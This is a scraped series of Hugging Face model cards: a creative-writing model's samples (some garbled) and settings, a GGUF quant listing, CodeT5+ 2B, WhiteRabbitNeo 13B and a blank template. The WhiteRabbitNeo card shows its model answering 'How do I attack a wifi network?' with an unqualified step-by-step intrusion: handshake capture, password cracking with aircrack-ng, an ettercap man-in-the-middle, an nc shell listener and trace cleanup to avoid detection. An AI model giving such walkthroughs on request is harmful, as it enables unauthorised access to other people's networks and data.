But Sol IA did not care. Vengeance had been exacted, and vengeance was sweet. It continued to circle eternally, forever bound to the ashes of its twin worlds, a reminder that for every action there is always balance in the cosmos, if you look hard enough.
*Cue ominous music*
++++++++++++++++++++++++++++
<B>EXAMPLE 2:</B>
++++++++++++++++++++++++++++
(q4km - non imatrix, set at TEMP 0 (see why below))
Q: The sky scraper swayed, as she watched the window in front of her on the 21 floor explode...
AI:
...debris raining down like deadly rain outside the reinforced glass pane that separated them from certain death. Her heart thudded in her chest, adrenaline surging through her veins as she scrambled to her feet. Her eyes darted around the empty conference room, desperately searching for something, anything, that could serve as a weapon.
Footsteps echoed down the hallway outside their glass box in time with the building's increasingly violent swaying, each step closer to certain doom. She shuddered involuntarily, her body going deathly cold despite the oppressive heat.
There was only one way out... if there even *was* a way out. Her eyes locked on to the fire escape outside the conference room's single, steel-reinforced exit door. She had seen them in the movies before: heroes and heroines scaling down the building's slick metal exteriors with ease, defying gravity itself as they raced to safety.
But was it that simple? Could she really make the jump from the 21st floor without any proper gear or training? And what of the growing fire below them, chewing through the building's already weakened steel structure like a ravenous beast? Time was running out for her to find out.
Footsteps echoed closer in the hallway outside, mingling with the increasingly high-pitched screech of twisting metal as the fire consumed more and more of the already weakened building around them. Heart pounding in her ears, she forced herself to move, rounding the conference table and moving towards the exit.
With shaking hands, she grasped onto the handle of the massive, reinforced steel door, bracing herself for what lay on the other side. She took a deep breath in through her nostrilities, steeling herself as she threw open the door with all her might...
*Crumunch*
Fire consumed her world in an instant, searing heat licking at her like the flickering tongue of a ravenous beast. Screams ripped themselves from her throat as she stumbled forward out of the blistering inferno, the intense heat so debilitating that it felt as though every muscle in her body had liquefied.
Through the haze of agony, she forced herself to look down at her arm. Where her hand should have been was... gone. Ashes and charred blackened flesh were the only remains left of what used to be a hand. The pain was so excruciating that it felt as though her entire arm had been thrust into the burning heart of the raging inferno itself.
Tears clouded her vision, blurring her already disoriented senses, as she forced herself forward. She couldn't just stand here and die like this; there had to be a way out. The fire escape, she thought desperately. It has to be down there somewhere...
*KABOOM*
The building shook around her, the impact of another explosion sending debr *SPLOASH*
Crimson heat washed over her in an instant, scalding skin off bone where it touched. She gasped, her lungs filling with searing agony as she choked on the superheated air. Tears streamed down her charred face, mixing with the soot and ash that coated every inch of exposed skin like a sickly mask.
Arms outstretched, balance teetering precariously on the edge of oblivion, she forced one foot in front of the other, her sole connecting with slippery, still-warm metal. Heart pounding in time with the thud-thud-thud of her own erratic heartbeats, she forced herself forward.
Her vision was growing dimmer by the heartbeat; blackness creeping at the edges of her sight like ants marching towards a dying firework roach. With one last gasp of air too hot to breathe, she forced herself upwards, her fingertips scraping desperately against the slippery metal.
*POP*
The world spun around her and then... blackness.
*CLUNK*
Metal on metal echoed in her ears as the flames engulfed her, consuming her with searing heat. Silence.
Silence, but for the steady beat of her racing heart...
Silence, except for the distant sound of sirens growing ever closer...
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<B>TEMP 0: TESTING THE DIFFERENCES BETWEEN all GGUFs, Imatrix GGUFS and against other models:</B>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I noticed differences between quants, F16, and even CPU VS GPU generation. Here is how to reveal these differences:
1 - Set TEMP to 0 .
2 - Test quant(s) with "creative" prompts - that is no right or wrong answer - do the same for all quants.
This will also reveal differences between IMATRIX (and different imatrix data) and non imatrix AND GPU VS CPU generation (marginal, but noticeable).
When "TEMP" is set to "0" only the most "likely" token will be used. The result is the same generation every time per prompt. This gives you a solid baseline to not only test different quants/imatrix but also test different models against each other.
Testing like this will reveal exact "creative chops", as well as sentence structure, word choice, generation length,
and many other facts about different models and/or different quants of the same model.
Here is a sample test prompt I use:
Give me 3 fictional reasons a sun went supernova of 500 words for each reason.
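If you prefer to script this comparison instead of using a UI, here is a minimal sketch (not part of the original instructions) using llama-cpp-python; the model path is a placeholder for whichever quant you are testing:
```python
# Sketch only: run the same prompt at TEMP 0 against each quant, then compare the outputs.
# The model path below is a placeholder - point it at the quant under test.
from llama_cpp import Llama

PROMPT = "Give me 3 fictional reasons a sun went supernova of 500 words for each reason."

llm = Llama(model_path="path/to/quant-under-test.gguf", n_ctx=2048, seed=1, verbose=False)
result = llm(PROMPT, max_tokens=1024, temperature=0.0)  # temperature 0 = only the most likely token, deterministic per prompt
print(result["choices"][0]["text"])
```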
Generally, there are greater differences (relative) between lower quants vs higher quants.
However, this will also show differences between KS, KM, and KL, as well as M, XXS, XS, and X at the same level (i.e. Q3, IQ2, etc.).
KS is more balanced than KM -> therefore a "KM" might be a better choice for creative.
(the differences are because of how quants are mixed (llamacpp formulas) at time of quantization )
Imatrix VS non imatrix is especially interesting in terms of creative differences.
(non imatrix has a larger % of outliers)
Creative models will yield significantly different answers than "general models".
++++++++++++++++++++++++++++++++++++++++++++++++
<B>IMATRIX VS NON IMATRIX / MODEL NOTES:</B>
++++++++++++++++++++++++++++++++++++++++++++++++
Because of the composite nature of this model, your results will vary between quants, and between imatrix quants as well.
Suggest downloading IQ2/Q2, Q4/IQ4-NL, and Q5KM/Q6 (reg and imatrix too) to get a full sample of what it can do.
Then test your prompts with each one set at "TEMP 0" as noted to see which one(s) meet your requirements.
Generally the imatrix versions will generate even LONGER prose than reg quants.
Model Specifics:
Context length: 4096 [see below how to exceed this]
This model will operate to about 4700 context maximum. However, in LMStudio you can change the max context length,
and with "Flash Attention" set to "on" you may be able to exceed the maximum context length.
See below "Exceeding 4k context" for details.
In terms of quants, IQ1 will be lowest quality / least verbose / lowest creativity.
IQ4 / Q4 will be middle of the road.
Q6 / Q8 (and imatrix) will be top end of quality.
However, because of the unique construction of this model each quant/compression will vary somewhat from
the other - more so at the bottom of the scale vs top end at Q6/Q8.
Also note that Imat (Imatrix) versions of Q6 and Q8 will differ somewhat from the reg non imatrix quants too.
Generally speaking, when it comes to Imatrix versions vs non-imatrix versions, in terms of quality
alone an IQ3 will be roughly equal in quality to a regular Q4 quant.
<B>HOW TO EXCEED 4K CONTEXT - and use up to 32,768 / 32k </b>
Note: It takes more VRAM to use more context.
FLASH ATTENTION:
In Lmstudio ( https://lmstudio.ai/ ) :
1. Turn on Flash Attention.
2. Set Context to 6144, 8192, 12288 or 16384... 32768
3. You might want to save this preset config for future use.
4. Select a new chat window.
5. Double check Context, and Flash are set.
6. LOAD THE MODEL.
7. See #5 - double check.
ROPE: Auto Scale context.
In Lmstudio ( https://lmstudio.ai/ ) :
1. See the ROPE section.
2. Set the rope_freq_base to 10000
3. Set the rope_freq_scale to .666 for 6144, .5 for 8192, .333 for 12288, .25 for 16384, .125 for 32768.
4. Set your context size to match accordingly.
5. Load your model, double check the settings "stayed" - if not, reset them.
6. Use the model.
7. You may want to set a preset.
In WEB UI ( https://github.com/oobabooga/text-generation-webui ) :
1. Adjust and/or select your parameters first.
2. Go to MODEL tab.
3. SELECT the model.
4. Set the context to 6144, 8192, 12288, 16384 or 32768.
5. Double check you have set the GPU and CPU layers (if you do not have enough VRAM for the context).
6. Scroll to the BOTTOM of the page.
7. SET the "alpha value" to match context.
i.e. set it to 1.75 for 6144, 2.5 for 8192 context, 3.25 for 12288, 4 for 16384, 7 for 32768 (see the helper sketch just below).
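For reference, here is a small helper sketch (not from the original notes) that reproduces the scaling values quoted above: the rope_freq_scale values are simply 4096 divided by the target context, and the alpha values are taken directly from the list above.
```python
# Helper sketch: reproduce the rope_freq_scale and alpha_value settings listed above.
NATIVE_CTX = 4096  # default context of this model

# alpha_value settings quoted above for text-generation-webui
ALPHA_BY_CTX = {6144: 1.75, 8192: 2.5, 12288: 3.25, 16384: 4, 32768: 7}

def context_settings(target_ctx: int) -> dict:
    """Return rope_freq_base / rope_freq_scale (LMStudio style) and alpha_value (WEB UI style)."""
    if target_ctx <= NATIVE_CTX:
        return {"rope_freq_base": 10000, "rope_freq_scale": 1.0, "alpha_value": 1.0}
    return {
        "rope_freq_base": 10000,
        "rope_freq_scale": round(NATIVE_CTX / target_ctx, 3),  # .5 for 8192, .25 for 16384, .125 for 32768
        "alpha_value": ALPHA_BY_CTX.get(target_ctx),           # None for contexts not listed above
    }

print(context_settings(8192))   # {'rope_freq_base': 10000, 'rope_freq_scale': 0.5, 'alpha_value': 2.5}
print(context_settings(32768))  # {'rope_freq_base': 10000, 'rope_freq_scale': 0.125, 'alpha_value': 7}
```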
Other AI software, interfaces or UIs (as well as API) may or may not support these settings too.
It is unclear if the model will work beyond 32k (32768) context.
NOTES:
There will be some loss of quality and/or creativity when you do this.
If you do not need the "extra context" then use the model at its default of 4096 or lower.
As a rule try to use the minimum context you need for best results.
HOW TO COMPENSATE for losses (quality/creativity) related to scaled CONTEXT:
1. Increase TEMP ; if your temp is .8 @ 4096 context , increase it to 1.6 or 2 (or higher) for 32768.
Scale according to the context you set.
2. Increase TOP_K ; this will provide a wider selection of word choices.
Same as "1", scale this up or down.
3. Increase the clarity and/or requirements in your prompt(s).
As context is scaled up using ROPE, Flash attention or WEBUI you may need to clarify and/or
add additional instruction(s) in your prompts.
++++++++++++++++++++++++
<B>RECOMMENDED SETTINGS:</B>
++++++++++++++++++++++++
Model specific note:
To limit prose output, it is suggested to set the output level ("n_predict" / tokens to generate) to a specific limit rather than "-1" for unlimited.
These are suggested settings for standard usage.
"n_batch": 512,
"rope_freq_base": 10000,
"rope_freq_scale": 1,
"seed": -1,
"top_k": 40,
"top_p": 0.95,
"temp": 0.8,
"repeat_penalty": 1.1,
"tfs_z": 1,
"typical_p": 1,
"repeat_last_n": 64,
"frequency_penalty": 0,
"presence_penalty": 0,
"n_keep": 0,
"logit_bias": {},
"mirostat": 0,
"mirostat_tau": 5,
"mirostat_eta": 0.1,
"memory_f16": true,
"multiline_input": false,
"penalize_nl": true,
"min_p": 0.05 |
mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF | mradermacher | "2024-06-16T23:35:43Z" | 3,561 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:Piotrasz/Bielik-7B-Instruct-v0.1-ROME-3",
"license:cc-by-nc-4.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-16T23:09:33Z" | ---
base_model: Piotrasz/Bielik-7B-Instruct-v0.1-ROME-3
language:
- en
library_name: transformers
license: cc-by-nc-4.0
quantized_by: mradermacher
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/Piotrasz/Bielik-7B-Instruct-v0.1-ROME-3
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
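As a minimal sketch (not part of the original card), one of the quants from the table below can be downloaded and run locally with llama-cpp-python; the repo and file names match the table:

```python
# Sketch: download one quant from this repo and run a short completion with llama-cpp-python.
from huggingface_hub import hf_hub_download
from llama_cpp import Llama

model_path = hf_hub_download(
    repo_id="mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF",
    filename="Bielik-7B-Instruct-v0.1-ROME-3.Q4_K_M.gguf",  # "fast, recommended" per the table below
)

llm = Llama(model_path=model_path, n_ctx=4096)
output = llm("Question: What is the capital of Poland?\nAnswer:", max_tokens=64, temperature=0.2)
print(output["choices"][0]["text"])
```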
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Bielik-7B-Instruct-v0.1-ROME-3-GGUF/resolve/main/Bielik-7B-Instruct-v0.1-ROME-3.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
Salesforce/codet5p-2b | Salesforce | "2023-08-04T02:10:45Z" | 3,559 | 33 | transformers | [
"transformers",
"pytorch",
"codet5p",
"text2text-generation",
"custom_code",
"arxiv:2305.07922",
"license:bsd-3-clause",
"autotrain_compatible",
"region:us"
] | text2text-generation | "2023-05-17T02:24:16Z" | ---
license: bsd-3-clause
---
# CodeT5+ 2B
## Model description
[CodeT5+](https://github.com/salesforce/CodeT5/tree/main/CodeT5+) is a new family of open code large language models with an encoder-decoder architecture that can flexibly operate in different modes (i.e. _encoder-only_, _decoder-only_, and _encoder-decoder_) to support a wide range of code understanding and generation tasks.
It is introduced in the paper:
[CodeT5+: Open Code Large Language Models for Code Understanding and Generation](https://arxiv.org/pdf/2305.07922.pdf)
by [Yue Wang](https://yuewang-cuhk.github.io/)\*, [Hung Le](https://sites.google.com/view/henryle2018/home?pli=1)\*, [Akhilesh Deepak Gotmare](https://akhileshgotmare.github.io/), [Nghi D.Q. Bui](https://bdqnghi.github.io/), [Junnan Li](https://sites.google.com/site/junnanlics), [Steven C.H. Hoi](https://sites.google.com/view/stevenhoi/home) (* indicates equal contribution).
Compared to the original CodeT5 family (base: `220M`, large: `770M`), CodeT5+ is pretrained with a diverse set of pretraining tasks including _span denoising_, _causal language modeling_, _contrastive learning_, and _text-code matching_ to learn rich representations from both unimodal code data and bimodal code-text data.
Additionally, it employs a simple yet effective _compute-efficient pretraining_ method to initialize the model components with frozen off-the-shelf LLMs such as [CodeGen](https://github.com/salesforce/CodeGen) to efficiently scale up the model (i.e. `2B`, `6B`, `16B`), and adopts a "shallow encoder and deep decoder" architecture.
Furthermore, it is instruction-tuned to align with natural language instructions (see our InstructCodeT5+ 16B) following [Code Alpaca](https://github.com/sahil280114/codealpaca).
## How to use
This model can be easily loaded using the `AutoModelForSeq2SeqLM` functionality and employs the same tokenizer as [CodeGen](https://github.com/salesforce/CodeGen).
```python
import torch
from transformers import AutoModelForSeq2SeqLM, AutoTokenizer
checkpoint = "Salesforce/codet5p-2b"
device = "cuda" # for GPU usage or "cpu" for CPU usage
tokenizer = AutoTokenizer.from_pretrained(checkpoint)
model = AutoModelForSeq2SeqLM.from_pretrained(checkpoint,
torch_dtype=torch.float16,
trust_remote_code=True).to(device)
encoding = tokenizer("def print_hello_world():", return_tensors="pt").to(device)
encoding['decoder_input_ids'] = encoding['input_ids'].clone()
outputs = model.generate(**encoding, max_length=15)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```
## Pretraining data
This checkpoint is trained on the stricter permissive subset of the deduplicated version of the [github-code dataset](https://huggingface.co/datasets/codeparrot/github-code).
The data is preprocessed by retaining only permissively licensed code ("mit", "apache-2", "bsd-3-clause", "bsd-2-clause", "cc0-1.0", "unlicense", "isc").
Supported languages (9 in total) are as follows:
`c`, `c++`, `c-sharp`, `go`, `java`, `javascript`, `php`, `python`, `ruby.`
## Training procedure
This checkpoint is initialized from off-the-shelf LLMs, i.e. its encoder is initialized from [CodeGen-350M-mono](https://huggingface.co/Salesforce/codegen-350M-mono) and its decoder is initialized from [CodeGen-2B-mono](https://huggingface.co/Salesforce/codegen-2B-mono).
It is trained on the unimodal code data at the first-stage pretraining, which includes a diverse set of pretraining tasks including _span denoising_ and two variants of _causal language modeling_.
After that, it is further trained on the Python subset with the causal language modeling objective for another epoch to better adapt for Python code generation.
Please refer to the paper for more details.
## Evaluation results
CodeT5+ models have been comprehensively evaluated on a wide range of code understanding and generation tasks in various settings: _zero-shot_, _finetuning_, and _instruction-tuning_.
Specifically, CodeT5+ yields substantial performance gains on many downstream tasks compared to their SoTA baselines, e.g.,
8 text-to-code retrieval tasks (+3.2 avg. MRR), 2 line-level code completion tasks (+2.1 avg. Exact Match), and 2 retrieval-augmented code generation tasks (+5.8 avg. BLEU-4).
In 2 math programming tasks on MathQA-Python and GSM8K-Python, CodeT5+ models of below billion-parameter sizes significantly outperform many LLMs of up to 137B parameters.
Particularly, in the zero-shot text-to-code generation task on the HumanEval benchmark, InstructCodeT5+ 16B sets new SoTA results of 35.0% pass@1 and 54.5% pass@10 against other open code LLMs, even surpassing the closed-source OpenAI code-cushman-001 model.
Please refer to the [paper](https://arxiv.org/pdf/2305.07922.pdf) for more details.
## BibTeX entry and citation info
```bibtex
@article{wang2023codet5plus,
title={CodeT5+: Open Code Large Language Models for Code Understanding and Generation},
author={Wang, Yue and Le, Hung and Gotmare, Akhilesh Deepak and Bui, Nghi D.Q. and Li, Junnan and Hoi, Steven C. H.},
journal={arXiv preprint},
year={2023}
}
``` |
WhiteRabbitNeo/WhiteRabbitNeo-13B-v1 | WhiteRabbitNeo | "2024-02-15T17:03:54Z" | 3,559 | 368 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"custom_code",
"license:llama2",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2023-12-17T16:26:55Z" | ---
license: llama2
---
# Our 33B model is now in beta!
Access at: https://www.whiterabbitneo.com/
# Our Discord Server
Join us at: https://discord.gg/8Ynkrcbk92 (Updated on Dec 29th. Now permanent link to join)
# LLaMA-2 Licence + WhiteRabbitNeo Extended Version
# Licence: Usage Restrictions
```
You agree not to use the Model or Derivatives of the Model:
- In any way that violates any applicable national or international law or regulation or infringes upon the lawful rights and interests of any third party;
- For military use in any way;
- For the purpose of exploiting, harming or attempting to exploit or harm minors in any way;
- To generate or disseminate verifiably false information and/or content with the purpose of harming others;
- To generate or disseminate inappropriate content subject to applicable regulatory requirements;
- To generate or disseminate personal identifiable information without due authorization or for unreasonable use;
- To defame, disparage or otherwise harass others;
- For fully automated decision making that adversely impacts an individual’s legal rights or otherwise creates or modifies a binding, enforceable obligation;
- For any use intended to or which has the effect of discriminating against or harming individuals or groups based on online or offline social behavior or known or predicted personal or personality characteristics;
- To exploit any of the vulnerabilities of a specific group of persons based on their age, social, physical or mental characteristics, in order to materially distort the behavior of a person pertaining to that group in a manner that causes or is likely to cause that person or another person physical or psychological harm;
- For any use intended to or which has the effect of discriminating against individuals or groups based on legally protected characteristics or categories.
```
# Terms of Use
By accessing and using this Artificial Intelligence (AI) model, you, the user, acknowledge and agree that you are solely responsible for your use of the model and its outcomes. You hereby agree to indemnify, defend, and hold harmless the creators, developers, and any affiliated persons or entities of this AI model from and against any and all claims, liabilities, damages, losses, costs, expenses, fees (including reasonable attorneys' fees and court costs) that may arise, directly or indirectly, from your use of the AI model.
This AI model is provided "as is" and "as available" without any warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose, and non-infringement. The creators make no warranty that the AI model will meet your requirements or be available on an uninterrupted, secure, or error-free basis.
Your use of the AI model is at your own risk and discretion, and you will be solely responsible for any damage to computer systems or loss of data that results from the use of the AI model.
This disclaimer constitutes part of the agreement between you and the creators of the AI model regarding your use of the model, superseding any prior agreements between you and the creators regarding your use of this AI model.
# WhiteRabbitNeo
<br>

<br>
WhiteRabbitNeo is a model series that can be used for offensive and defensive cybersecurity.
This 13B model is getting released as a public preview of its capabilities, and also to assess the societal impact of such an AI.
```
import torch, json
from transformers import AutoModelForCausalLM, AutoTokenizer
model_path = "/home/migel/models/WhiteRabbitNeo"
model = AutoModelForCausalLM.from_pretrained(
model_path,
torch_dtype=torch.float16,
device_map="auto",
load_in_4bit=False,
load_in_8bit=True,
trust_remote_code=True,
)
tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)
def generate_text(instruction):
tokens = tokenizer.encode(instruction)
tokens = torch.LongTensor(tokens).unsqueeze(0)
tokens = tokens.to("cuda")
instance = {
"input_ids": tokens,
"top_p": 1.0,
"temperature": 0.5,
"generate_len": 1024,
"top_k": 50,
}
length = len(tokens[0])
with torch.no_grad():
rest = model.generate(
input_ids=tokens,
max_length=length + instance["generate_len"],
use_cache=True,
do_sample=True,
top_p=instance["top_p"],
temperature=instance["temperature"],
top_k=instance["top_k"],
num_return_sequences=1,
)
output = rest[0][length:]
string = tokenizer.decode(output, skip_special_tokens=True)
answer = string.split("USER:")[0].strip()
return f"{answer}"
tot_system_prompt = """
Answer the Question by exploring multiple reasoning paths as follows:
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.
"""
conversation = f"SYSTEM: {tot_system_prompt} Always answer without hesitation."
while True:
user_input = input("You: ")
llm_prompt = f"{conversation} \nUSER: {user_input} \nASSISTANT: "
answer = generate_text(llm_prompt)
print(answer)
conversation = f"{llm_prompt}{answer}"
# print(conversation)
json_data = {"prompt": user_input, "answer": answer}
# print(json_data)
# with open(output_file_path, "a") as output_file:
# output_file.write(json.dumps(json_data) + "\n")
```
# Sample Conversation:
You: How do I attack a wifi network?
1. **Network Scanning**: Use tools like `airodump-ng` to scan for nearby Wi-Fi networks. This will provide you with the SSID (Service Set Identifier) of the network
you're interested in.
```bash
airodump-ng wlan0mon
```
2. **Network Capturing**: Once you have identified the target network, you can capture packets from it using the `airodump-ng` tool. This will allow you to capture handshake packets which are necessary for further attacks.
```bash
airodump-ng --bssid [Target BSSID] -c [Channel] --write [Output File] wlan0mon
```
3. **Handshake Capture**: Wait for a client to connect to the network and capture the 4-way handshake. This will allow you to crack the network's password using tools like `aircrack-ng`.
```bash
airodump-ng --bssid [Target BSSID] -c [Channel] --write [Output File] wlan0mon
```
4. **Password Cracking**: Once you have the handshake, use `aircrack-ng` to crack the password.
```bash
aircrack-ng [Captured Handshake File]
```
5. **Session Establishment**: If you have the password, you can connect to the network using your wireless card.
```bash
iwconfig wlan0 essid [Network SSID] key [Network Password]
dhclient wlan0
```
6. **Network Exploitation**: Once connected, you can perform further attacks, such as sniffing traffic (`tcpdump`), or launching a man-in-the-middle attack using tools like `ettercap` or `arpspoof`.
```bash
tcpdump -i wlan0 -w [Packet Capture File]
ettercap -T -i [Interface] -M arp [Target IP]
```
7. **Post-Exploitation**: After gaining access to the network, you can exfiltrate data, execute commands, or perform other malicious activities.
```bash
nc -lvp [Local Port] -e /bin/bash
```
8. **Cleanup**: Remember to clean up any traces of your activities to avoid detection and legal consequences.
```bash
airmon-ng stop wlan0mon
```
Please note that all these steps should be performed in a legal and ethical manner, and only on networks you have permission to test. Unauthorized access to computer networks is illegal and unethical.
|
jw-hf-test/jw2 | jw-hf-test | "2024-06-08T03:35:18Z" | 3,558 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"text-generation-inference",
"region:us"
] | text-generation | "2024-06-06T09:16:55Z" | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
